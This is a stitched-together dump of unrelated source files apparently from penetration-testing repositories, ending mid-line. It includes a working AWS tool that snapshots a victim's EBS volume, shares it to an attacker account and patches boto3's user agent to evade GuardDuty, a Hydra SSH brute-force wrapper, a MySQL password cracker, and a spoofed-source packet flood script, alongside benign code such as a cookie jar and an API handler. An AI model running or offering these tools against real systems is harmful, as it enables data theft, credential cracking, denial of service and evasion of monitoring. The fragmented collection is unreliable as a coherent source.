SUPPORTED_METHODS = ["GET"]
def get(self):
"""Get data for target severity chart.
**Example request**:
.. sourcecode:: http
GET /api/targets/severitychart/ HTTP/1.1
X-Requested-With: XMLHttpRequest
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
{
"status": "success",
"data": {
"data": [
{
"color": "#A9A9A9",
"id": 0,
"value": 100,
"label": "Not Ranked"
}
]
}
}
"""
try:
self.success(get_targets_by_severity_count(self.session))
except exceptions.InvalidParameterType:
raise APIError(400, "Invalid parameter type provided")
| 30.517123 | 113 | 0.476962 |
Penetration-Testing-Study-Notes | #!/usr/bin/env python
import subprocess
import sys
if len(sys.argv) != 3:
print "Usage: sshrecon.py <ip address> <port>"
sys.exit(0)
ip_address = sys.argv[1].strip()
port = sys.argv[2].strip()
print "INFO: Performing hydra ssh scan against " + ip_address
HYDRA = "hydra -L wordlists/userlist -P wordlists/offsecpass -f -o results/%s_sshhydra.txt -u %s -s %s ssh" % (ip_address, ip_address, port)
try:
results = subprocess.check_output(HYDRA, shell=True)
resultarr = results.split("\n")
for result in resultarr:
if "login:" in result:
print "[*] Valid ssh credentials found: " + result
except:
print "INFO: No valid ssh credentials found"
| 29.954545 | 140 | 0.670588 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# This script abuses insecure permissions given to the EC2 IAM Role to exfiltrate target EC2's
# filesystem data in a form of it's shared EBS snapshot or publicly exposed AMI image.
#
# CreateSnapshot:
# Abuses:
# ec2:CreateSnapshot
# ec2:ModifySnapshotAttribute
#
# The script will firstly create an EBS volume snapshot of the provided volume id. Then it will
# modify that snapshot's attributes to make it available for the foreign AWS Account that's going to
# be the Attacker's account. Then, the attacker will be able to create an EBS volume out of that snapshot.
# After doing so, the script will stop specified by the Attacker EC2 instance in order to later on attach it
# with a previously created volume. Afterwards, the instance will be restarted and the attacker will be able
# to mount freshly attached volume in the operating system to further examine its contents.
#
# This technique is safe to be demonstrated during AWS Penetration tests.
#
#
# CreateImage:
# Abuses:
# ec2:CreateImage
# ec2:ModifyImageAttribute
#
# NOT FULLY IMPLEMENTED YET.
# For this technique, the procedure is following - the script will create an image out of specified victim's EC2
# instance. This image will become publicly available (caution with client sensitive data!). After that, the script
# will attempt to create/import public SSH RSA keys to the attacker's account and then create an EC2 instance using that
# publicly available just created AMI image. Ultimately, the attacker will be able to SSH into newly created box to
# further examine it's filesystem contents.
#
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests
#
# Author: Mariusz Banach / mgeeky, '19, <[email protected]>
#
import sys
import pyjq
import json
import time
import boto3
import argparse
from botocore.exceptions import ClientError
config = {
'verbose' : False,
'region' : '',
'victim' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'attacker' : {
'profile' : '',
'access-key' : '',
'secret-key' : '',
'token' : '',
},
'method' : '',
'volume-id': '',
'instance-id': '',
'attach-instance-id': '',
}
class Logger:
@staticmethod
def _out(x):
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[>] ' + x)
@staticmethod
def info(x):
if config['verbose']:
Logger._out('[.] ' + x)
@staticmethod
def fatal(x):
sys.stdout.write('[!] ' + x + '\n')
sys.exit(1)
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
class ExfiltrateEC2:
session = None
def __init__(self, region, attacker_keys, victim_keys):
self.region = region
self.keys = {
'attacker' : {},
'victim' : {},
}
self.keys['attacker'] = attacker_keys
self.keys['victim'] = victim_keys
self.session = {
'attacker' : None,
'victim' : None,
}
Logger.info(f"Using region: {region}")
Logger.info("Authenticating using Attacker's AWS credentials...")
self.session['attacker'] = self.authenticate(region, attacker_keys)
Logger.info("Authenticating using Victim's AWS credentials...")
self.session['victim'] = self.authenticate(region, victim_keys)
def authenticate(self, region, keys):
session = None
try:
if keys['profile']:
session = boto3.Session(
profile_name = keys['profile'],
region_name = region
)
else:
session = boto3.Session(
aws_access_key_id = keys['access-key'],
aws_secret_access_key = keys['secret-key'],
aws_session_token = keys['token'],
region_name = region
)
except Exception as e:
Logger.fail(f'Could not authenticate to AWS: {e}')
raise e
return session
def get_session(self, whose):
return self.session[whose]
def get_account_id(self, whose):
try:
return self.session[whose].client('sts').get_caller_identity()['Account']
except Exception as e:
Logger.fatal(f'Could not Get Caller\'s identity: {e}')
def create_snapshot(self, attacker_instance_id, volume_id, availability_zone):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
target_user = self.get_account_id('attacker')
snapshot = None
volume_created = None
modify_result = None
Logger.out(f"Step 1: Creating EBS volume snapshot. VolumeId = {volume_id}")
try:
snapshot = victim_client.create_snapshot(
Description = f'Exfiltrated EBS snapshot of volume: {volume_id}',
VolumeId = volume_id
)
Logger.ok(f"Snapshot of volume {volume_id} created: {snapshot['SnapshotId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateSnapshot action on Victim failed. Exception: {e}")
Logger.out(f"Step 2: Modifying snapshot attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_snapshot_attribute(
Attribute = f'createVolumePermission',
OperationType = 'add',
SnapshotId = snapshot['SnapshotId'],
UserIds = [
target_user,
]
)
Logger.ok(f"Snapshot's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifySnapshotAttribute action on Victim failed. Exception: {e}")
Logger.out(f"Step 3: Waiting for the snapshot to transit into completed state.")
try:
victim_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot['SnapshotId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for snapshot completed state failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 4: Creating EBS volume in Attacker's {target_user} AWS account.")
attacker_instance_data = None
try:
if not availability_zone:
availability_zone = self.region + 'a'
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
availability_zone = inst['Placement']['AvailabilityZone']
attacker_instance_data = inst
Logger.info(f"Obtained Attacker's EC2 instance Availbility Zone automatically: {availability_zone}")
break
except Exception as e:
Logger.fail(f"THIS MAY BE FATAL: Could not enumerate attacker's instance with given InstanceId = {attacker_instance_id}")
Logger.fail(f"Exception: {e}")
raise e
availability_zone = self.region + 'a'
try:
volume_created = attacker_client.create_volume(
AvailabilityZone = availability_zone,
Encrypted = False,
VolumeType = 'gp2',
SnapshotId = snapshot['SnapshotId']
)
Logger.ok(f"Created EBS volume ({volume_created['VolumeId']} at Attacker's side out from exfiltrated snapshot ({snapshot['SnapshotId']})")
except Exception as e:
Logger.fail(f"ec2:CreateVolume action on Attacker failed. Exception: {e}")
Logger.out(f"Step 5: Waiting for the volume to transit into created state.")
try:
attacker_client.get_waiter('volume_available').wait(VolumeIds=[volume_created['VolumeId']])
except Exception as e:
Logger.fail(f"boto3 Waiter for volume available failed. Exception: {e}")
Logger.info("Waiting in a traditional manner: 3 minutes.")
time.sleep(3 * 60)
Logger.out(f"Step 6: Attaching created EBS volume to Attacker's specified EC2 instance")
try:
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
if 'IncorrectInstanceState' in str(e):
Logger.fail("Attacker's machine is in running state, preventing to attach it a volume.")
Logger.info("Trying to stop the EC2 instance, then attach the volume and then restart it.")
try:
attacker_instance = attacker_client.stop_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_stopped').wait(InstanceIds = [attacker_instance_id, ])
attacker_client.attach_volume(
Device = '/dev/xvdf',
InstanceId = attacker_instance_id,
VolumeId = volume_created['VolumeId']
)
Logger.ok(f"Attached volume to the specified Attacker's EC2 instance: {attacker_instance_id}")
except Exception as e:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
Logger.fail("Tried to automatically stop attacker's EC2 instance, then attach volume and restart it, but that failed as well.")
Logger.fail(f"Exception: " + str(e))
Logger.info("Restarting it...")
attacker_instance = attacker_client.start_instances(
InstanceIds = [attacker_instance_id, ]
)
attacker_client.get_waiter('instance_running').wait(InstanceIds = [attacker_instance_id, ])
try:
attacker_instance = attacker_client.describe_instances(
InstanceIds = [attacker_instance_id, ]
)
for inst in attacker_instance['Reservations'][0]['Instances']:
if inst['InstanceId'] == attacker_instance_id:
attacker_instance_data = inst
break
except: pass
else:
Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}")
try:
Logger.out(f"Cleanup. Trying to remove created snapshot ({snapshot['SnapshotId']}) at Victim's estate...")
victim_client.delete_snapshot(SnapshotId = snapshot['SnapshotId'])
Logger.ok(f"Snapshot removed.")
except Exception as e:
Logger.fail(f"(That's ok) ec2:DeleteSnapshot action on Victim failed. Exception: {e}")
ssh_command = 'SSH to the attacker\'s EC2 instance\n'
if attacker_instance_data:
try:
ip = attacker_instance_data['PublicIpAddress']
except:
Logger.fail(f"Could not obtain Attacker's EC2 Public ip address. Available fields:\n {attacker_instance_data}\n")
ip = "ec2-ip-address"
if ip:
ssh_command = f'''SSH to the attacker's EC2 instance
# ssh ec2-user@{ip}
'''
print(f'''
===============================================================
[MODULE FINISHED]
===============================================================
[+] Exfiltrated snapshot of a victim's EBS volume:
VictimVolumeId = {volume_id}
[+] By creating a snapshot of it, shared to the attacker's AWS user ID.
SnapshotId = {snapshot['SnapshotId']}
If everything went fine, Attacker's AWS account {target_user} should have a EBS volume now:
AttackerVolumeId = {volume_created['VolumeId']}
That was attached to the specified attacker's EC2 instance:
AttackerInstanceId = {attacker_instance_id}
AvailibityZone = {availability_zone}
Most likely as a '/dev/xvdf' device.
===============================================================
To examine exfiltrated data:
0) {ssh_command}
1) List block devices mapped:
# lsblk
2) If above listing yielded mapped block device, e.g. xvdf, create a directory for it:
# mkdir /exfiltrated
3) Mount that device's volume:
# mount /dev/xvdf1 /exfiltrated
4) Review it's contents:
# ls -l /exfiltrated
''')
return True
def create_image(self, instance_id, image_name, image_description):
victim_client = self.session['victim'].client('ec2')
attacker_client = self.session['attacker'].client('ec2')
created_image = None
try:
Logger.out("Step 1: Creating a publicly available AMI image out of specified EC2 instance.")
created_image = victim_client.create_image(
InstanceId = instance_id,
Name = image_name,
Description = image_description
)
Logger.ok(f"AMI Image with name: ({image_name}) created: {created_image['ImageId']}")
except Exception as e:
Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}")
target_user = self.get_account_id('attacker')
Logger.out(f"Step 2: Modifying image attributes to share it with UserId = {target_user}")
try:
modify_result = victim_client.modify_image_attribute(
Attribute = 'launchPermission',
ImageId = created_image['ImageId'],
OperationType = 'add',
UserIds = [
target_user,
]
)
Logger.ok(f"Image's attributes modified to share it with user {target_user}")
except Exception as e:
Logger.fatal(f"ec2:ModifyImageAttribute action on Victim failed. Exception: {e}")
# Step 3: Import custom SSH RSA public key
# client.import_key_pair(
# KeyName = "Some key name"
# PublicKeyMaterial = "key material"
# )
# Step 4: Create an instance from exported AMI
# client.run_instances(
# ImageId = "ami-00000000",
# SecurityGroupIds = ["sg-00000", ],
# SubnetId = "subnet-aaaaaa",
# Count = 1,
# InstanceType = "t2.micro",
# KeyName = "Some key name",
# Query = "Instances[0].InstanceId",
# )
# Returns:
# "i-00001111002222"
# Step 5: Connect to that EC2 instance
# client.describe_instances(
# InstanceIds = ["i-00001111002222"],
# Query = "Reservations[0].Instances[0].PublicIpAddress"
# )
# Returns:
# "1.2.3.4"
#
# $ ssh [email protected]
# $ ls -l
print(f"""
===============================================================
[!] REST OF THE EXPLOIT LOGIC HAS NOT BEEN IMPLEMENTED YET.
===============================================================
[.] You can proceed manually from this point:
1) Create an EC2 instance in region: {self.region}
2) Make sure this EC2 instance is being created out of public AMI image with ID:
Image ID: {created_image['ImageId']}
3) Setup SSH keys, Security Groups, etc.
4) SSH into that machine.
Created EC2 instance's filesystem will be filled with files coming from the exfiltrated EC2.
""")
def parseOptions(argv):
global config
print('''
:: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz Banach / mgeeky '19, <[email protected]>
''')
parser = argparse.ArgumentParser(prog = argv[0])
parser._action_groups.pop()
required = parser.add_argument_group('required arguments')
optional = parser.add_argument_group('optional arguments')
attacker = parser.add_argument_group('Attacker\'s AWS credentials - where to instantiate exfiltrated EC2')
victim = parser.add_argument_group('Victim AWS credentials - where to find EC2 to exfiltrate')
required.add_argument('--region', type=str, help = 'AWS Region to use.')
attacker.add_argument('--profile', type=str, help = 'Attacker\'s AWS Profile name to use if --access-key was not specified', default = 'default')
attacker.add_argument('--access-key', type=str, help = 'Attacker\'s AWS Access Key ID to use if --profile was not specified')
attacker.add_argument('--secret-key', type=str, help = 'Attacker\'s AWS Secret Key ID')
attacker.add_argument('--token', type=str, help = '(Optional) Attacker\'s AWS temporary session token')
victim.add_argument('--victim-profile', type=str, help = 'Victim\'s AWS Profile name to use if --access-key was not specified')
victim.add_argument('--victim-access-key', type=str, help = 'Victim\'s AWS Access Key ID to use if --profile was not specified')
victim.add_argument('--victim-secret-key', type=str, help = 'Victim\'s AWS Secret Key ID')
victim.add_argument('--victim-token', type=str, help = '(Optional) Victim\'s AWS temporary session token')
optional.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
subparsers = parser.add_subparsers(help='Available methods', dest='method')
a = 'Creates a snapshot of a running or stopped EC2 instance in an AMI image form.'\
' This AMI image will then be shared with another AWS account, constituing exfiltration opportunity.'
createimage = subparsers.add_parser('createimage', help = a)
createimage.add_argument('--instance-id', help = '(Required) Specifies instance id (i-...) to create an image of.')
createimage.add_argument('--image-name', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a name for newly created AMI image. Default: "Exfiltrated AMI image"')
createimage.add_argument('--image-desc', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a description for newly created AMI image. Default: "Exfiltrated AMI image"')
b = 'Creates a snapshot of an EBS volume used by an EC2 instance.'\
' This snapshot will then be shared with another AWS account, constituing exfiltration opportunity.'
createsnapshot = subparsers.add_parser('createsnapshot', help = b)
createsnapshot.add_argument('--volume-id', help = '(Required) Specifies EBS volume id (vol-...) to create a snapshot of.')
createsnapshot.add_argument('--attach-instance-id', help = '(Required) Specifies Attacker\'s instance ID where snapshot should be attached as a volume (i-...). This instance must be created in the same region as specified and must be in a STOPPED state. Otherwise, this script will automatically stop the instance and then restart it after attaching volume.')
createsnapshot.add_argument('--availability-zone', help = '(Optional) Specifies in which Attacker\'s EC2 instance availability zone was placed. If this parameter is not specified, the program will try to invoke ec2:DescribeInstances to find that information automatically.')
args = parser.parse_args()
config['verbose'] = args.verbose
config['region'] = args.region
if args.method == 'createimage':
if args.instance_id != None:
config['instance-id'] = args.instance_id
else:
Logger.fatal('--instance-id parameter is required for this to work.')
if args.method == 'createsnapshot':
if args.volume_id != None and args.attach_instance_id != None:
config['volume-id'] = args.volume_id
config['attach-instance-id'] = args.attach_instance_id
config['availability-zone'] = args.availability_zone
else:
Logger.fatal('--volume-id and --attach-instance-id parameters are required for this to work.')
if not args.region:
Logger.fatal("Please provide AWS region to operate in.")
if args.profile and (args.access_key or args.secret_key or args.token):
Logger.fatal("There should only be used either profile name or raw credentials for Attacker's AWS keys!")
if args.victim_profile and (args.victim_access_key or args.victim_secret_key or args.victim_token):
Logger.fatal("There should only be used either profile name or raw credentials for Victim's AWS keys!")
if args.profile:
config['attacker']['profile'] = args.profile
Logger.info(f"Using attacker's profile: {args.profile}")
elif args.access_key and args.secret_key:
config['attacker']['access-key'] = args.access_key
config['attacker']['secret-key'] = args.secret_key
config['attacker']['token'] = args.token
Logger.info(f"Using passed Attacker's AWS credentials: ******{args.access_key[-6:]}")
else:
Logger.fatal("Both access key and secret key must be specified for Attacker's AWS credentials if profile was not used!")
if args.victim_profile:
config['victim']['profile'] = args.victim_profile
Logger.info(f"Using victim's profile: {args.victim_profile}")
elif args.victim_access_key and args.victim_secret_key:
config['victim']['access-key'] = args.victim_access_key
config['victim']['secret-key'] = args.victim_secret_key
config['victim']['token'] = args.victim_token
Logger.info(f"Using passed Victim's AWS credentials: ******{args.victim_access_key[-6:]}")
else:
Logger.fatal("Both access key and secret key must be specified for Victim's AWS credentials if profile was not used!")
return args
def monkeyPatchBotocoreUserAgent():
'''
This is to avoid triggering GuardDuty 'PenTest:IAMUser/KaliLinux' alerts
Source:
https://www.thesubtlety.com/post/patching-boto3-useragent/
'''
import sys
import boto3
import botocore
try:
from _pytest.monkeypatch import MonkeyPatch
except (ImportError, ModuleNotFoundError) as e:
print('[!] Please install "pytest" first: pip3 install pytest')
print('\tthis will be used to patch-up boto3 library to avoid GuardDuty Kali detection')
sys.exit(0)
monkeypatch = MonkeyPatch()
def my_user_agent(self):
return "Boto3/1.9.89 Python/2.7.12 Linux/4.2.0-42-generic"
monkeypatch.setattr(botocore.session.Session, 'user_agent', my_user_agent)
def main(argv):
opts = parseOptions(argv)
if not opts:
Logger.err('Options parsing failed.')
return False
monkeyPatchBotocoreUserAgent()
exp = ExfiltrateEC2(
opts.region,
config['attacker'],
config['victim'],
)
if opts.method == 'createimage':
Logger.info("Abusing ec2:CreateImage...")
exp.create_image(opts.instance_id, opts.image_name, opts.image_desc)
elif opts.method == 'createsnapshot':
Logger.out("Abusing dangerous ec2:CreateSnapshot and ec2:ModifySnapshotAttribute...\n")
exp.create_snapshot(opts.attach_instance_id, opts.volume_id, opts.availability_zone)
else:
Logger.fatal(f"Unknown method specified: {opts.method}")
if __name__ == '__main__':
main(sys.argv)
| 41.534271 | 363 | 0.60357 |
cybersecurity-penetration-testing | import random
from scapy.all import *
target = raw_input("Enter the Target IP ")
i=1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = "."
src = a+dot+b+dot+c+dot+d
print src
st = random.randint(1,1000)
en = random.randint(1000,65535)
loop_break = 0
for srcport in range(st,en):
IP1 = IP(src=src, dst=target)
TCP1 = TCP(sport=srcport, dport=80)
pkt = IP1 / TCP1
send(pkt,inter= .0001)
print "packet sent ", i
loop_break = loop_break+1
i=i+1
if loop_break ==50 :
break
| 21 | 42 | 0.649241 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import socket
class SP():
def server(self):
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('192.168.1.103',80))
s.listen(1) # Now wait for client connection.
while True:
try:
c, addr = s.accept()
print ('Got connection from', addr)
while True:
data=c.recv(1024)
if data:
d=data.decode('utf-8')
print("Got data :" +str(d))
c.send(str("ACK : " +str(d)+" ...").encode('utf-8'))
else:
print("No more data from client : " +str(addr))
break
finally:
c.close()
except Exception as ex:
print("Exception caught :"+str(ex))
s.close()
obj=SP()
obj.server()
| 21.4375 | 64 | 0.548117 |
PenetrationTestingScripts | """Firefox 3 "cookies.sqlite" cookie persistence.
Copyright 2008 John J Lee <[email protected]>
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file
COPYING.txt included with the distribution).
"""
import logging
import time
from _clientcookie import CookieJar, Cookie, MappingIterator
from _util import isstringlike, experimental
debug = logging.getLogger("mechanize.cookies").debug
class Firefox3CookieJar(CookieJar):
"""Firefox 3 cookie jar.
The cookies are stored in Firefox 3's "cookies.sqlite" format.
Constructor arguments:
filename: filename of cookies.sqlite (typically found at the top level
of a firefox profile directory)
autoconnect: as a convenience, connect to the SQLite cookies database at
Firefox3CookieJar construction time (default True)
policy: an object satisfying the mechanize.CookiePolicy interface
Note that this is NOT a FileCookieJar, and there are no .load(),
.save() or .restore() methods. The database is in sync with the
cookiejar object's state after each public method call.
Following Firefox's own behaviour, session cookies are never saved to
the database.
The file is created, and an sqlite database written to it, if it does
not already exist. The moz_cookies database table is created if it does
not already exist.
"""
# XXX
# handle DatabaseError exceptions
# add a FileCookieJar (explicit .save() / .revert() / .load() methods)
def __init__(self, filename, autoconnect=True, policy=None):
experimental("Firefox3CookieJar is experimental code")
CookieJar.__init__(self, policy)
if filename is not None and not isstringlike(filename):
raise ValueError("filename must be string-like")
self.filename = filename
self._conn = None
if autoconnect:
self.connect()
def connect(self):
import sqlite3 # not available in Python 2.4 stdlib
self._conn = sqlite3.connect(self.filename)
self._conn.isolation_level = "DEFERRED"
self._create_table_if_necessary()
def close(self):
self._conn.close()
def _transaction(self, func):
try:
cur = self._conn.cursor()
try:
result = func(cur)
finally:
cur.close()
except:
self._conn.rollback()
raise
else:
self._conn.commit()
return result
def _execute(self, query, params=()):
return self._transaction(lambda cur: cur.execute(query, params))
def _query(self, query, params=()):
# XXX should we bother with a transaction?
cur = self._conn.cursor()
try:
cur.execute(query, params)
return cur.fetchall()
finally:
cur.close()
def _create_table_if_necessary(self):
self._execute("""\
CREATE TABLE IF NOT EXISTS moz_cookies (id INTEGER PRIMARY KEY, name TEXT,
value TEXT, host TEXT, path TEXT,expiry INTEGER,
lastAccessed INTEGER, isSecure INTEGER, isHttpOnly INTEGER)""")
def _cookie_from_row(self, row):
(pk, name, value, domain, path, expires,
last_accessed, secure, http_only) = row
version = 0
domain = domain.encode("ascii", "ignore")
path = path.encode("ascii", "ignore")
name = name.encode("ascii", "ignore")
value = value.encode("ascii", "ignore")
secure = bool(secure)
# last_accessed isn't a cookie attribute, so isn't added to rest
rest = {}
if http_only:
rest["HttpOnly"] = None
if name == "":
name = value
value = None
initial_dot = domain.startswith(".")
domain_specified = initial_dot
discard = False
if expires == "":
expires = None
discard = True
return Cookie(version, name, value,
None, False,
domain, domain_specified, initial_dot,
path, False,
secure,
expires,
discard,
None,
None,
rest)
def clear(self, domain=None, path=None, name=None):
CookieJar.clear(self, domain, path, name)
where_parts = []
sql_params = []
if domain is not None:
where_parts.append("host = ?")
sql_params.append(domain)
if path is not None:
where_parts.append("path = ?")
sql_params.append(path)
if name is not None:
where_parts.append("name = ?")
sql_params.append(name)
where = " AND ".join(where_parts)
if where:
where = " WHERE " + where
def clear(cur):
cur.execute("DELETE FROM moz_cookies%s" % where,
tuple(sql_params))
self._transaction(clear)
def _row_from_cookie(self, cookie, cur):
expires = cookie.expires
if cookie.discard:
expires = ""
domain = unicode(cookie.domain)
path = unicode(cookie.path)
name = unicode(cookie.name)
value = unicode(cookie.value)
secure = bool(int(cookie.secure))
if value is None:
value = name
name = ""
last_accessed = int(time.time())
http_only = cookie.has_nonstandard_attr("HttpOnly")
query = cur.execute("""SELECT MAX(id) + 1 from moz_cookies""")
pk = query.fetchone()[0]
if pk is None:
pk = 1
return (pk, name, value, domain, path, expires,
last_accessed, secure, http_only)
def set_cookie(self, cookie):
if cookie.discard:
CookieJar.set_cookie(self, cookie)
return
def set_cookie(cur):
# XXX
# is this RFC 2965-correct?
# could this do an UPDATE instead?
row = self._row_from_cookie(cookie, cur)
name, unused, domain, path = row[1:5]
cur.execute("""\
DELETE FROM moz_cookies WHERE host = ? AND path = ? AND name = ?""",
(domain, path, name))
cur.execute("""\
INSERT INTO moz_cookies VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)
""", row)
self._transaction(set_cookie)
def __iter__(self):
# session (non-persistent) cookies
for cookie in MappingIterator(self._cookies):
yield cookie
# persistent cookies
for row in self._query("""\
SELECT * FROM moz_cookies ORDER BY name, path, host"""):
yield self._cookie_from_row(row)
def _cookies_for_request(self, request):
session_cookies = CookieJar._cookies_for_request(self, request)
def get_cookies(cur):
query = cur.execute("SELECT host from moz_cookies")
domains = [row[0] for row in query.fetchall()]
cookies = []
for domain in domains:
cookies += self._persistent_cookies_for_domain(domain,
request, cur)
return cookies
persistent_coookies = self._transaction(get_cookies)
return session_cookies + persistent_coookies
def _persistent_cookies_for_domain(self, domain, request, cur):
cookies = []
if not self._policy.domain_return_ok(domain, request):
return []
debug("Checking %s for cookies to return", domain)
query = cur.execute("""\
SELECT * from moz_cookies WHERE host = ? ORDER BY path""",
(domain,))
cookies = [self._cookie_from_row(row) for row in query.fetchall()]
last_path = None
r = []
for cookie in cookies:
if (cookie.path != last_path and
not self._policy.path_return_ok(cookie.path, request)):
last_path = cookie.path
continue
if not self._policy.return_ok(cookie, request):
debug(" not returning cookie")
continue
debug(" it's a match")
r.append(cookie)
return r
| 32.518072 | 76 | 0.563811 |
cybersecurity-penetration-testing | import requests
import sys
url = sys.argv[1]
values = []
for i in xrange(100):
r = requests.get(url)
values.append(int(r.elapsed.total_seconds()))
average = sum(values) / float(len(values))
print "Average response time for "+url+" is "+str(average) | 20.25 | 58 | 0.69685 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import MySQLdb
class mysql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mysql.conf")
def mysql_connect(self,ip,username,password,port):
crack =0
try:
db=MySQLdb.connect(ip,username,password,port=port)
if db:
crack=1
db.close()
except Exception, e:
if e[0]==1045:
self.lock.acquire()
print "%s mysql's %s:%s login fail" %(ip,username,password)
self.lock.release()
else:
self.lock.acquire()
print "connect %s mysql service at %s login fail " %(ip,port)
self.lock.release()
crack=2
return crack
def mysq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.mysql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack mysql now...")
print "[*] start crack mysql %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mysql']:
pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack mysql %s" % time.ctime()
print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'mysql': ['127.0.0.1:3306']}
pinglist=['127.0.0.1']
test=mysql_burp(c)
test.run(ipdict,pinglist,50,file="../result/test") | 32.95 | 127 | 0.507182 |
Broken-Droid-Factory | import random
import randomword
from patchers import patcher_interface
class data_in_memory(patcher_interface.patcher):
'''
Adds code that displays having data in memory
'''
difficulty = 1
def patch(self):
'''
Adds Java code to display having unknown data from a static re perspective be stored in memory.
'''
self.logger("Adding encryption of device data in memory")
str_builder_name = "{}{}".format(randomword.get_random_word(), random.randint(0, 1000))
list_of_data_calls = [
'stringBuilder{}.append(Build.DEVICE).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.MODEL).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.PRODUCT).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.BOARD).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.getRadioVersion()).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.BOOTLOADER).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.DISPLAY).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.FINGERPRINT).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.HARDWARE).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.HOST).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.ID).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.MANUFACTURER).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.TAGS).append(" ");\n'.format(str_builder_name),
'stringBuilder{}.append(Build.TYPE).append(" ");\n'.format(str_builder_name)]
str_builder = 'StringBuilder stringBuilder{} = new StringBuilder();\n'.format(str_builder_name)
for iterator in range(0, random.randint(0, 40)):
str_builder = str_builder + random.choice(list_of_data_calls) + "\n"
string_name = "{}{}".format(randomword.get_random_word(), random.randint(0, 1000))
str_builder = str_builder + "String plainTextString{} = stringBuilder{}.toString();\n".format(string_name,
str_builder_name)
str_builder = str_builder + '''try {
TimeUnit.SECONDS.sleep(30);
} catch (InterruptedException e) {
e.printStackTrace();
}'''
str_builder = str_builder + '''try {{
Cipher cipher{cipher_var} = null;
cipher{cipher_var} = Cipher.getInstance("AES/CBC/PKCS5PADDING");
KeyGenerator keygen{keygen_var} = null;
keygen{keygen_var} = KeyGenerator.getInstance("AES");
keygen{keygen_var}.init(256);
SecretKey key{key_var} = keygen{keygen_var}.generateKey();
byte[] plainText{plaintext_var} = plainTextString{string_var}.getBytes();
cipher{cipher_var}.init(Cipher.ENCRYPT_MODE, key{key_var});
byte[] cipherText{ciphertext_var} = new byte[0];
cipherText{ciphertext_var} = cipher{cipher_var}.doFinal(plainText{plaintext_var});
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {{
Log.v(getApplicationContext().getPackageName(), "Encrypted Data: "+Base64.getEncoder().encodeToString(cipherText{ciphertext_var}));
}}
}}catch (NoSuchAlgorithmException | InvalidKeyException | NoSuchPaddingException | IllegalBlockSizeException | BadPaddingException e) {{
e.printStackTrace();
}}\n'''.format(cipher_var=randomword.get_random_word() + str(random.randint(0, 1000)),
keygen_var=randomword.get_random_word() + str(random.randint(0, 1000)),
key_var=randomword.get_random_word() + str(random.randint(0, 1000)),
